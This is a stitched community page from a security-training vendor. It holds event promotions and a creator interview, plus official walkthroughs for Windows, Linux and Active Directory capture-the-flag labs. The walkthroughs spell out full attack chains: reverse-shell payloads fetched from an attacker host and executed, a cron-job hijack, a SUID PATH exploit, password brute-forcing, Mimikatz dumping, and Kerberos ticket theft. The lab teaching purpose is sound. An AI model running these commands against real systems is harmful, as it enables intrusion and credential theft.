The Human Connection Challenge Lab 1: Basic OS Skills – Walkthrough Guide (Community Version)
This is a walkthrough guide written by one of our community members, who offered to give their perspective on the challenge. Interestingly, they approached this challenge by completing some of the tasks in the graphical user interface (GUI) instead of the command line.October is here! Prepare for Cybersecurity Awareness Month with Immersive 🎃
In a world where technology and threats are constantly evolving, building a resilient team is more important than ever. At Immersive, we're proud to be your partner in this journey, and we've put together a fantastic lineup of events, challenges, and resources throughout October to help you and your teams stay ahead of the curve. What’s on at Immersive this Cybersecurity Awareness Month 📆 Oct 1st Whitepaper: GenAI’s Impact on Cybersecurity Skills and Training Oct 6th Trick or Treat on Specter Street Challenge Begins: Labs 1-3 Oct 9th Labs Live: Ripper's Riddle Community Webinar Oct 13th Trick or Treat on Specter Street Challenge: Labs 4 - 6 Oct 15th Webinar: How to Build a People-Centric Defense for AI-Driven Attacks Oct 16th Labs Live: Cursed Canvas Community Webinar Oct 20th Trick or Treat on Specter Street Challenge: Labs 7 - 9 Oct 22nd Cyber Resilience Customer Awards Winners Revealed Oct 23rd Labs Live: Macro Polo Community Webinar Oct 27th Trick or Treat on Specter Street Challenge: Labs 10-12 Oct 30th Labs Live: Phantom Pages Webinar Oct 31st Trick or Treat on Specter Street Challenge Finale: Labs 13 Oct 31st Virtual Crisis Sim: The Puppet Master’s Trick or Treat Challenges and Labs Trick or Treat on Specter Street 👻 Welcome to Trick or Treat on Specter Street, a Halloween-themed cybersecurity challenge where you'll use both offensive and defensive skills to solve a mystery unlike anything we’ve encountered before. Each week throughout October, we’ll drop new hands-on labs that slowly begin to uncover the secrets of Specter Street. Can you crack the case? Find out more. AI Foundations 🤖 Ready to navigate the rapidly evolving world of Artificial Intelligence with confidence? Give our new AI Foundations lab collection a go! Designed to equip your teams with critical AI knowledge and practical implementation skills; this initial collection features seven foundational labs that progressively guide your teams from high-level overviews to secure, hands-on AI implementation. Find out more. Events and Webinars Webinar How to Build a People-Centric Defense for AI-Driven Attacks Wednesday October 15th A must-attend event for understanding how threat actors are leveraging AI and other emerging technologies to carry out attacks. Register Now. Virtual Crisis Sim The Puppet Master’s Trick or Treat Friday October 31st Join us on Halloween as the notorious Puppet Master returns for a fiendish game of Trick or Treat 🎃 Play along with our Immersive crisis response experts as we tackle a LIVE coordinated attack from the Puppet Master on a Critical National Infrastructure organization. Dare you play the Puppet Master’s game and survive, or will they finally get their revenge?! Register Now. AI and Emerging Threats Throughout the month, we’re shining a spotlight on the rise of AI in cyber. From our all-new AI Foundational lab series to cutting edge research from the experts at the cutting edge of GenAI in cybersecurity in our latest whitepaper: GenAI’s Impact on Cybersecurity Skills and Training. Explore our latest AI-focused resources and upskill your teams to confidently face the future of cyber resilience. Check out our latest reports, articles, webinars and more on GenAI, here. Celebrating Cyber Resilience Heroes 🏆 We're also celebrating the individuals and organizations at the forefront of cyber resilience with our Cyber Resilience Customer Awards. Keep your eyes peeled on our social channels! We'll be unveiling our latest winners on October 22nd, recognizing those who demonstrate an outstanding commitment to proving and improving their cyber readiness. It's going to be a jam-packed month focused on practical application and deep engagement. Let’s make this the most secure October yet!
Enter The Maze Challenge: Immersive’s Most Advanced Collection Yet
Today marks the release of the Maze Challenge, Immersive’s most advanced and cunningly designed offensive cybersecurity collection yet. This new series of labs is more than just a test of skills. It's a puzzle, a game, and a creative brain-bender, crafted by two of Immersive’s most brilliant minds: StefanApostol and SabrinaKayaci. Stefan, known to many as the "evil genius" behind the Human Connection Challenge, and Sabrina, who recently inspired our London community meetup attendees with her predictions on AI within the AppSec space, have teamed up to create something truly unique. We sat down with them to get their insights on what makes the Maze Challenge so special, so challenging, and so much fun. What was the main inspiration behind the maze theme, and how did you translate that narrative into a collection of technical labs? The core idea for the Maze Challenge, as Stefan explained, came from a shared love of games. "Both Sabrina and I are geeks. We like games, and we wanted to create a challenge with an overarching goal that was more than about earning a completion token." While our labs have always awarded tokens for completion, Stefan and Sabrina wanted to create a narrative that would engage users on a deeper level. "A maze is the perfect example of that," Stefan said. "We wanted to include a game element in these challenges." This isn't just a series of technical scenarios. It's a cohesive puzzle where each lab is a step toward a larger objective. The maze narrative encourages participants to think creatively, connecting different skills and techniques in a way that feels more like a game than a traditional capture the flag (CTF). I’ve heard that this is the most advanced lab collection yet. So, what makes these labs more challenging than the thousands of others in Immersive's catalogue? This collection is Immersive's most advanced to date, introducing a range of techniques not yet widely covered in the platform. The labs are a combination of real-world examples drawn from the creators' past experiences and internal testing, all woven together with a good deal of imagination. While the challenge covers a broad spectrum of offensive skills, including web, Linux, Windows, and Active Directory, Stefan was quick to name binary exploitation as an obvious concept that will have participants scratching their heads. The team collaborated with BenMcCarthy on this particular lab, and Ben being Ben, he poured all his creativity into it, making even Stefan nervous to attempt this mean challenge! Sabrina added that the real difficulty lies in the type of thinking required. "Some of them will really require outside-the-box thinking," she said. "They're unusual in a way that requires not just the technical skill, but some creativity and more critical thinking." This is a key theme throughout the collection. Participants can't rely on a simple, formulaic approach. Instead, they must be flexible and resourceful. Sabrina noted that some challenges will require "multiple sets of skills," forcing users to chain together their expertise in different areas to find a solution. Without giving away any spoilers, can you describe a moment in one of the labs that you're particularly proud of designing? Sabrina beamed as she recalled the Inner Maze lab. "I really enjoyed creating Inner Maze," she said, before adding a cryptic twist. "When you break out of that maze is when you're really trapped." She was particularly proud of her ability to create and then beat her own challenge, finding the exploit even more difficult than the design itself. Can you give users any hints or tips? The Maze Challenge is designed to be tough, and you should certainly expect it to be just that. However, the creators want everyone to have a fair shot, so they’ve some advice for those who might feel intimidated. Use the platform to your advantage. Stefan noted that around 98% of concepts within this challenge can be learned in the rest of our lab catalogue. “If you get stuck on a specific skill, take a break from the maze, find the relevant labs on the platform, and then come back with your newfound knowledge.” We encourage you to learn along the way, and persistence is always rewarded! Failure can be a sign of progress. Sabrina shared a key insight: "Sometimes it's important to take note of what it is you're doing that's failing... If you're failing at the same spot in a particular approach, that could actually mean that you're doing something right." Go figure that one out! Don't go it alone. Sabrina advises anyone starting their journey to ask others for advice and help. Our community help forum is a great resource for sharing knowledge and getting tips from fellow participants. We want you to have fun, and part of that fun is collaborating with your industry peers along the way. In the end, what do you hope participants will take away from this experience, beyond the technical skills? Stefan and Sabrina both hope it's a "desire for more challenges”! They also dropped a teaser for a community Halloween challenge… That’s all you’re getting for now! 👀 Want a head start? Join Stefan and Sabrina for a Labs Live webinar on August 19th. They’ll be solving the Improbable Maze lab live on the call, in collaboration with you. Attendees are encouraged to play along, offer their suggestions, methods, and frustrations. It’s the perfect opportunity to see the creators’ thought process and gain some momentum for your own journey through the maze. See you there!Labs Live Special: The Human Connection Season Finale
Join us for a special Labs Live event celebrating the conclusion of The Human Connection Challenge: Season 1! As we wrap up this highly anticipated challenge, we're hosting a live webinar featuring the one and only Stefan Apostol, the "evil genius" and author behind the labs! The Human Connection Challenge: Season 1 tasked cyber professionals like you with tackling 7 never-before-seen labs covering a range of critical offensive security topics, from Basic OS Skills to Active Directory. It's been an epic season of skill-polishing, resilience-building, and demonstrating expertise within the community. In this session, Stefan will leverage the interactive Labs Live format for episode 7: Active Directory. He'll share his techniques, explain the intended solutions, and answer your burning questions live. Whether you crushed all 7 labs, or tried a couple, this is a unique opportunity to learn directly from the source. Haven't completed the labs yet? There's still time to be a Season 1 Winner! Complete one or more of the seven challenge labs in The Human Connection Challenge: Season 1 collection before the deadline of Monday, 2nd June 2025, to be entered into our exclusive Season Finale Prize Draw. Every lab you complete gives you one entry, so completing all seven gives you seven chances to win incredible prizes. More details here.Community Challenge Season 1 Winners
From November to May we released monthly lab challenges and awarded limited edition challenge coins to the members who were: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent Don't worry if you didn't take part, the labs are still available, with walkthrough guides available if you get stuck. To celebrate the 7th and final lab of the season we raised the stakes, with prizes available to anyone who completed 1 or more challenge lab before the deadline: 🥇 Tickets, Flights & Accommodation to an Immersive Summit in NYC or London 🥈 2 x PlayStation®5 Consoles 🥉 10 x Apple AirPods or JBL Headphones Not all of our winners can be named, but I am happy to share the details of some of the winners: 🥇 Muhammed Sajid - QIIB 🥉 Akram Diri - SF Group 🥉 Michal Zywczak - HSBC 🥉 Audey Isaacs - Commonwealth Bank of Australia 🥉 Juan Calderon-Martinez - Siemens Don't be disheartened if you didn't win this time - some a-maze-ing new challenges are coming very soon...The Human Connection Challenge Lab 5: Windows Official Walkthrough Guide
Time’s Up! Congratulations to everyone who completed Lab 5: Windows from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target. With all that considered, let's get started. Overview This challenge isn’t linear, meaning you can start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first! For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!), I’ll simply talk through the technique that helped escalate privileges. Target 1 As always, when you don’t know anything about a target machine, you Nmap first. nmap -Pn -sVTC -p- <Target 1 IP> Here’s a breakdown of the flags used in this command: -Pn: Skip ping scanning -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts -p-: All ports (1-65535) Nmap reports that it got a 401 Unauthorized when doing an HTTP GET on port 80 but didn’t get the WWW-Authenticate header. This is not something you generally see because these two usually go hand in hand. Visiting the page confirms the 401 Unauthorized. However, checking the source code reveals the credentials IMLUser:hidd3n. These credentials won’t work for remote desktop protocol (RDP), but they will give you access to server message block (SMB). They’ll also give you access to C. C$ is a hidden share that requires administrator access, but C is a normal share and can be accessed by this user. Listing the Windows directory, the to-backup folder stands out, as it’s the only non-default folder. Browsing it reveals backups of SAM, SYSTEM, and SECURITY hives. These can be transferred offline and reconstructed to obtain local user hashes. get SAM.backup get SECURITY.backup get SYSTEM.backup impacket-secretsdump -sam SAM.backup -security SECURITY.backup -system SYSTEM.backup You can now either pass the hash and log in as administrator, or try to crack it. Both are valid methods, but this is the way to crack it: echo <Administrator Line> > hash john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT And you’ll get the credentials Administrator:blink182. Now you can log in over RDP and get your first token! xfreerdp /v:<Target 1 IP> /u:Administrator /dynamic-resolution +clipboard Target 2 Initial access Nmapping the second target reveals a website titled “Password Manager”. nmap -Pn -sVTC -p- <Target 2 IP> Upon visiting the website, you’ll see its URL is 10.102.38.73. It asks the user to choose a game from a drop-down box and submit their choice. Once a game is selected (such as World of Warcraft), it adds a parameter to the URL, which then becomes http://10.102.38.73/?game=WOW. You can scan this with SQLMap using the following command: sqlmap -u http://<Target 2 IP>/?game=* This will confirm that the target is vulnerable to SQL injection, so you can use the following command to gain code execution on the target host: sqlmap -u http://<Target 2 IP>/?game=* --os-shell With the ability to execute commands on the target system, you can now read the token. Privilege escalation Since the previous shell is limited, you can upload and execute a reverse Meterpreter shell to use all its privilege escalation functions. First, create the Meterpreter shell and serve it over HTTP using Python. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f exe > shell.exe sudo python -m http.server 80 In a different terminal, run your Metasploit listener. sudo msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost <Kali IP> set lport 443 exploit Finally, in your SQLMap’s OS shell, run the following commands to download and trigger your payload: powershell wget http://<Kali IP>/shell.exe -o C:\users\iis-admin\shell.exe C:\users\iis-admin\shell.exe Once you hit enter a second time you’ll get a connection back to your listener. Metasploit has a variety of post-exploitation modules you can try, but the one that will work is exploit/windows/local/service_permissions. Of course, you can do this with PowerUp or any other privilege escalation tool of your choice, but Metasploit just automates the exploitation process better in this case. use exploit/windows/local/service_permissions set session 1 exploit The module will first enumerate all local service permissions. Once it finds one that runs under a higher privilege user and it can modify, it automatically exploits this service and starts a new metasploit session under this new user. You’ll then find the token on the desktop. Target 3 Initial access Nmapping the second target reveals only two running services, SMB and RDP. nmap -Pn -sVTC -p- <Target 3 IP> Enumerating the SMB service reveals that guest access is enabled. The listing also shows a share called Shared. smbclient -L \\\\<Target 3 IP> -U guest smbclient \\\\<Target 3 IP>\\Shared -U guest You should soon reach the file reply.txt, which contains the password for the user IMLUser. With your newly found credentials (IMLUser:Shar3dPass), you can now RDP into the target. xfreerdp /v:<Target 3 IP> /u:IMLUser /p:Shar3dPass /dynamic-resolution You’ll find the first token in a file on the Desktop. Privilege escalation This privilege escalation technique is a rather classic one. After local file enumeration, you can find the Administrator password in C:\Windows\Panther\Unattend.xml and use it to run CMD as administrator and find the final token. Tools For this challenge, you’ll use a range of tools including: Nmap Metasploit Python SQLMap smbclient Tips When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application. To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Privilege Escalation: Windows Introduction to Metasploit SQL Injection Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!The Human Connection Challenge Lab 4: Linux Official Walkthrough Guide
Time’s Up! Congratulations to everyone who completed Lab 4: Linux from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target. With all that considered, let's get started. Overview This challenge is in no way linear and you could start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first! For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!). I’ll simply talk through the technique that helped escalate privileges. Target 1 First thing’s first, as with any pen test, Nmap! nmap -Pn -sVTC -p- <Target 1 IP> Here’s a breakdown of the flags used in this command: -Pn: Skip ping scanning -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts -p-: All ports (1-65535) Scanning all ports reveals that a Redis server is running version 4.0.1 on the target host. Since you have a version number, the next step is to identify any public exploits you could use. A quick Google search for the version reveals there is a Metasploit module available for this. First, fire up Metasploit as root with: sudo msfconsole Then, set all the necessary parameters needed for the exploit: set srvhost <Kali IP> set lhost <Kali IP> set rhosts <Target 1 IP> Then simply run the module. Since the module was successful, you’ll get a connection back to your Kali machine’s listener. Dropping into a shell reveals that you are root, and you can read the token to complete the first Target. Target 2 Initial access Back to square one. Since you don’t know anything about the second target, you must Nmap it and see what services it’s running. nmap -Pn -sVTC -p- <Target 2 IP> Since the only running service is SSH and the version doesn’t look like it would be vulnerable to any known exploits, you can attempt to connect to it and hope to gather more information. ssh <Target 2 IP> The SSH banner mentions the system is “reserved for john and friends”. Even though you aren’t friends with john, you now know that “john” is a valid system user so you can attempt a dictionary attack against this user. hydra -l john -P /usr/share/wordlists/metasploit/burnett_top_500.txt ssh://<Target 2 IP> The dictionary attack will reveal a valid password, trustno1. You can now use this password to log in as john over SSH and get the low-level token. ssh john@<Target 2 IP> Privilege escalation Now that you have access to the target, you can attempt to escalate your privileges. One of the methods is to find SUID binaries owned by root. These are binaries that can be executed with the privileges of their owner. If you can find one that uses another binary from the $PATH variable, you could exploit this behavior to escalate your privileges. find /usr/local/bin -perm -4000 Checking for SUID binaries reveals /usr/local/bin/ls-lh. After dumping the strings of this binary, you can see that it uses ls from $PATH. This is extremely dangerous, as any user could escalate privileges by creating a binary called ls, adding it to a writable directory, and exporting their PATH to first contain this directory before anything else. And that’s precisely what you’ll do to exploit this! First, create a file in /tmp called ls.c. touch /tmp/ls.c Then, add the following code that will spawn bash when run: #include <stdlib.h> int main(){ system("/bin/bash"); } Finally, compile this to /tmp/ls, add /tmp as the first location of the PATH variable, and run the original SUID binary. gcc -o /tmp/ls /tmp/ls.c export PATH=/tmp:$PATH ls-lh /root Target 3 Initial access Again, start with an Nmap scan to see what services are running on the target host. nmap -Pn -sVTC -p- <Target 3 IP> You can see from the output that the target is running an Apache webserver titled anna’s website. You can extend your Nmap command to run all HTTP scripts that don’t attempt brute forcing or DoS-ing against the target and try to uncover more information. nmap -Pn -sVTC --script="http* and not(brute or dos)" <Target 3 IP> This reveals that the target is running webdav. However, the status code returned is 401, which means you need valid credentials to access this. You know the username is anna, you just need to find the password. hydra -l anna -P /usr/share/wordlists/metasploit/burnett_top_500.txt -f <Target 3 IP> http-get /webdav This command reveals the password 123456. Unfortunately, your Kali instance doesn’t have a webdav client such as cadaver, but creativity is part of a pen tester’s job! Instead, use Metasploit’s windows/http/xampp_webdav_upload_php to get a reverse shell. Even though the target is Linux, this will still work because it uploads PHP. However, while the exploit is running, you must access the uploaded file manually to trigger it. use windows/http/xampp_webdav_upload_php set rhosts <Target 3 IP> set filename shell.php set username anna set password 123456 exploit Once the exploit module is triggered, you can access the uploaded file from a different terminal: wget http://anna:123456@<Target 3 IP>/webdav/shell.php And, of course, this triggers the reverse shell and you get a connection back to your Metasploit listener. Privilege escalation Checking crontab, you can see there is a recurring job run by root that clears webdav. The permissions on this file allow it to be modified by anyone. At this point, you could, in theory, just make it read the root token into a world-readable file and finish the challenge. But did you really hack it if you don’t have interactive access? First, generate a reverse shell using msfvenom: msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f elf > shell.elf Then, serve it using Python: sudo python -m http.server 80 Then, set up your Metasploit listener (since the port is 443, remember to run Metasploit as root): use multi/handler set payload linux/x64/meterpreter/reverse_tcp set lport 443 set lhost <Kali IP> exploit And finally, you can modify the file run by the cron job to trigger your exploit. echo “wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf” > /tmp/clear-dav.sh Once the job is triggered, it first downloads the file from your HTTP server. Then, you get a connection back to your Metasploit listener. Tools For this challenge, you’ll use a range of tools including: Nmap Metasploit Python GCC Hydra Tips When testing for vulnerabilities, remember that vulnerabilities may reside in any part of the target infrastructure. Subtle elements that appear unimportant could prove exploitable. So make sure you leave no stone unturned and check every single aspect of the target server. To learn more about some of the tools used in this lab, take a look at the following collections: Moving Around Secure Testing: Beginner Credential Access Privilege Escalation: Linux Introduction to Metasploit Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!Human Connection Challenge: Season 1 – Active Directory Official Walkthrough Guide (Community Version)
Time’s Up! Congratulations to everyone who completed Lab 7: Active Directory from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. This walkthrough uses placeholders for target IPs in brackets, such as <Kali IP>. Simply replace this with the actual IP of your Kali instance or the specific target. Let's get started! Task 1 What is the WS01 token in C:\Users\Administrator\Desktop\token.txt? The credentials panel gives you the following username and password combination for host WS01. offensive\jack.s:!nitialPass33. Use the following command to log in to WS01: xfreerdp /v:<WS01 IP> /u:jack.s /d:offensive +clipboard +drives /drive:home,/home/kali /dynamic-resolution The task asks you for the token in C:\users\Administrator\Desktop, so your first job is to escalate your privileges, since jack.s is only a low-level user. For this, you can transfer SharpUp.exe, found in /home/kali/Desktop/tools. Run all privilege escalation checks with the following command: SharpUp audit This gives you the credentials OffensiveAdmin:It’sBlankAnyway. You can now use the following command to RDP to WS01 as OffensiveAdmin: xfreerdp /v:<WS01 IP> /u:OffensiveAdmin +clipboard +drives /drive:home,/home/kali /dynamic-resolution With admin privileges, you can now read the token in C:\Users\Administrator\Desktop\token.txt. Task 2 What is the SRV01 token in C:\Users\tina.m\Desktop\token.txt? It’s clear from the task that we must get access to user tina.m who can connect to SRV01. With your new administrator privileges on WS01, open a task manager to check for possible user sessions. You’ll see that tina.m has a cmd.exe process running. This means you can now attempt to get their hash or password from memory using Mimikatz. mimikatz.exe privilege::debug sekurlsa::logonpasswords Using the credentials offensive\tina.m:PwdDump1ng1241, you can now log in to SRV01 and get your second token. Task 3 What is the DC token in C:\Users\Administrator\Desktop\token.txt? The last task asks you to connect to the DC, which means you need to become a domain administrator. Use PowerView-Dev.ps1 to enumerate the most common attack paths to Domain Admin. One of them would be unconstrained delegation. . .\PowerView-Dev.ps1 Get-DomainComputer -Unconstrained -Properties dnshostname It seems like SRV01 is trusted for unconstrained delegation. Since you have administrator privileges, you can obtain DC01’s ticket-granting ticket (TGT). First, transfer Rubeus.exe, and MS-RPRN.exe over to SRV01. Then, run Rubeus and monitor for tickets. Rubeus.exe monitor /interval:1 Then, force DC01 to make an SMB connection to SRV01 to grab the ticket. .\MS-RPRN.exe \\dc01.offensive.local \\srv01.offensive.local sed -i "s/ //g" ticket.txt tr -d "\n" < ticket.txt Then, on SRV01, run the following command to pass it. Rubeus.exe ptt /ticket:<formatted base64 encoded ticket> If you did all that correctly, running the command klist would reveal the Kerberos ticket for the machine account DC01$. Now, transfer mimikatz.exe and run the following command: mimikatz.exe lsadump::dcsync /user:administrator This will give you the hash 2c9299e44ee3abcf5c6f9e7938123334. You can now use Metasploit to connect to the DC, as follows: sudo msfconsole use exploit/windows/smb/psexec set smbuser administrator set smbpass aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334 set rhosts <DC IP> exploit Finally, you can drop into a shell and read the token at C:\Users\Administrator\Desktop\token.txt. Tools For this challenge, you’ll use a range of tools including: SharpUp PowerView Rubeus MS-RPRN Metasploit Tips When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application. To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Privilege Escalation: Windows Introduction to Metasploit Introduction to Active Directory Attacks Kerberos Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge!The Human Connection Challenge Season 1 Finale is Here!
Since November we’ve been dropping a monthly community lab challenges and awarding limited edition challenge coins to the members who were: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent However, all good things must come to an end, and so this month’s challenge will be the last of Season 1. But please don’t fret! To celebrate this occasion we have some awesome prizes up for grabs for anyone who completes a challenge lab before the 2nd June: 🥇 Tickets, Flights & Accommodation to an Immersive Summit in NYC or London 🥈 2 x PlayStation®5 Consoles 🥉 10 x Apple AirPods or JBL Headphones 👕 Much coveted Immersive swag and goodies! You can read all about the competition (including full terms and conditions) here. Ready to level up your cybersecurity skills and win some cool stuff? Dive into The Human Connection Challenge: Season 1 collection to get started!Cyber Countdown: Day 1
Lab of the Day Every day we’re revisiting a standout lab from the past year—highlighting its impact and the skills it helped build, whilst also introducing you to the experts who built it. To get us started, today’s lab is of course Episode 2 of our Community Challenge -Scanning. In this lab we’ll test your scanning and enumeration skills but other than that, you’ll find limited information available to guide you. Lab author BethHolden, Cyber Security Engineer here at Immersive Labs is passionate about offensive cybersecurity and created this challenge as a little Christmas treat. The lab contains a range of tools which may provide multiple ways to solve the challenge, she’s eager to see how well you fare – good luck! As a reminder, we reward the top performing community members in the following categories: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent 🎁 Spot Prizes In addition, at the end of each month, the lab author will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach similar labs in the future. We also encourage you to submit your own walkthrough guides to community@immersivelabs.com and we will feature any unique approaches in their own Community Walkthrough Guide. You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a prize you have until midnight on Sunday 22nd December 2024 to complete episode 2! To find the lab in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Scanning 🔔 Don’t miss out – there are 5 more labs to come in this challenge series. Make sure you're following the CHALLENGES Tag to get notified as soon as each one is released. Good Luck!
